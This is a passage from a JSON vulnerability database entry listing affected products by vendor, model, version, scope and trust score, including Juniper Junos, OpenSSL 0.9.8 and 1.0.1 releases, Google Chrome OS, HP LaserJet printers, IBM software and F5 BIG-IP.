"version": "12.1x44" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "13.1" }, { "model": "junos 12.1r7", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "10.3" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8o" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.110.6" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "power ps702", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "cloudplatform", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.30" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome for android", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "35.0.1916.141" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9.1" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v210.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.155" }, { "model": "laserjet pro color printer m251n/nw cf147a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20020140919" }, { "model": "horizon view feature pack", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "arubaos", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.4" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "cp1543-1", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2.2" }, { "model": "vsphere virtual disk development kit", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "fortimanager", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "laserjet p2055 printer series ce460a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20141201" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.35" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datafort e-series", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571471.43" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v2-480" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "junos 11.4r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.5.4" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6.10" }, { "model": "junos 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571431.43" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "laserjet printer series q7543a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "laserjet enterprise flow mfp m525c cf118a 2302963 436069", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.20" }, { "model": "fortios b0537", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.06" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "laserjet enterprise m806 cz244a 2302963 436075", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.3" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "9.1-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "laserjet enterprise color m775 series cf304a 2302963 436079", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "fortirecorder", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "1.4.2" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.00" }, { "model": "openvpn", "scope": "eq", "trust": 0.3, "vendor": "openvpn", "version": "2.3.3" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.32" }, { "model": "laserjet enterprise mfp m525f cf117a 2302963 436069", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "laserjet enterprise color m775 series cc522a 2302963 436079", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "secure analytics 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet enterprise color mfp m880 d7p70a 2302963 436068", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.6" }, { "model": "laserjet pro color mfp m276n/nw cf145a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20020140919" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.1.100.3" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "laserjet m9050 multifunction printer cc395a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0" }, { "model": "junos 13.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "integrity superdome and hp converged system for sap hana", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "x9005.50.12" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.20" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.3" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "sdn for virtual environments", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.2" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7400" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "tivoli workload scheduler distributed ga level", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "snapprotect", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "junos r8-s2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "color laserjet enterprise cp4525 cc495a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.49" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "laserjet enterprise mfp m725 cf069a 2302963 436078", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.0.1" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.2.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.1" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "database and middleware automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "tekelec hlr router", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "open systems snapvault agent", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web security gateway anywhere", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7" }, { "model": "laserjet p4515 cb515a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "laserjet pro mfp m425dn/dw cf286a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020140919" }, { "model": "laserjet enterprise m712 series cf236a 2302963 436080", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "idol speech software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.5.0.16091" }, { "model": "laserjet enterprise color m551 series cf082a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.8" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.10" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5.2" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.32" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.14" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "laserjet enterprise mfp m725 cf066a 2302963 436078", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.0" }, { "model": "wx5002/5004 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "netscaler 9.3.e", "scope": null, "trust": 0.3, "vendor": "citrix", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.71" }, { "model": "laserjet m9040 multifunction printer cc394a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51.256.1" }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "junos space 13.3r1.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise communications broker pcz2.0.0m4p5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.1" }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "vsr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.33" }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.130.14" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.14" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "junos r4-s2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.128.3" }, { "model": "virtuozzo containers for linux", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "4.6" }, { "model": "laserjet p4015 cb526a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "laserjet enterprise mfp m630 series j7x28a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "laserjet p3005 printer series q7813a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.190.3" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.4" }, { "model": "vsphere virtual disk development kit", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.24" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.37" }, { "model": "10.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "710/7300" }, { "model": "vdi-in-a-box", "scope": "ne", "trust": 0.3, "vendor": "citrix", "version": "5.3.8" }, { "model": "fortiauthenticator", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.08" }, { "model": "airwave", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "7.4" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.52" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "network connect 8.0r3.1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system chassis management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.8" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "p2000 g3 msa array system ts251p006", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "laserjet printer series q5404a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42508.250.2" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.5" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.1.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "flex system p270", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.04" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.10" }, { "model": "laserjet p4015 cb509a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.2" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "endeca information discovery studio", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.18" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null 